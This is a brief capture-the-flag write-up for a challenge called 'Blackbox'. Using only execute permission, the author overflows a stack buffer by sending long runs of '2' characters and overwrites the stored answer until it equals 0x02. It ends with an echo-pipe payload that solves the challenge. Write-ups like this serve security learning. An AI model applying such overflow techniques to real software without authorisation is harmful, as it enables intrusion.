Blackbox ¶

Permissions for blackbox executable are: ---x--s--x \ So, no gdb, no xxd, nothing. The only thing allowed is to execute the binary

blackbox@ubuntu-512mb-nyc3-01:~$ ./blackbox 
What is 1 + 1 = 2
No dummy... 1 + 1 != 0...
blackbox@ubuntu-512mb-nyc3-01:~$ ./blackbox 
What is 1 + 1 = 2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222
No dummy... 1 + 1 != 842150450...
*** stack smashing detected ***: <unknown> terminated

[4]+  Stopped                 ./blackbox

842150450 = 0x32323232, and 0x32 = 50 = ASCII value of '2'

So, we need to overflow the buffer to the precise amount so that result becomes 2 (= 0x2)

blackbox@ubuntu-512mb-nyc3-01:~$ ./blackbox 
What is 1 + 1 = 22222222222222222222222222222222222222222222222222222222222222222222222222     
No dummy... 1 + 1 != 0...
blackbox@ubuntu-512mb-nyc3-01:~$ ./blackbox 
What is 1 + 1 = 22222222222222222222222222222222222222222222222222222222222222222222222222222222222
No dummy... 1 + 1 != 3289650...
blackbox@ubuntu-512mb-nyc3-01:~$ ./blackbox 
What is 1 + 1 = 222222222222222222222222222222222222222222222222222222222222222222222222222222222     
No dummy... 1 + 1 != 50...

Got it!

blackbox@ubuntu-512mb-nyc3-01:~$ echo -n -e "22222222222222222222222222222222222222222222222222222222222222222222222222222222\x02" | ./blackbox

Blackbox¶

Blackbox ¶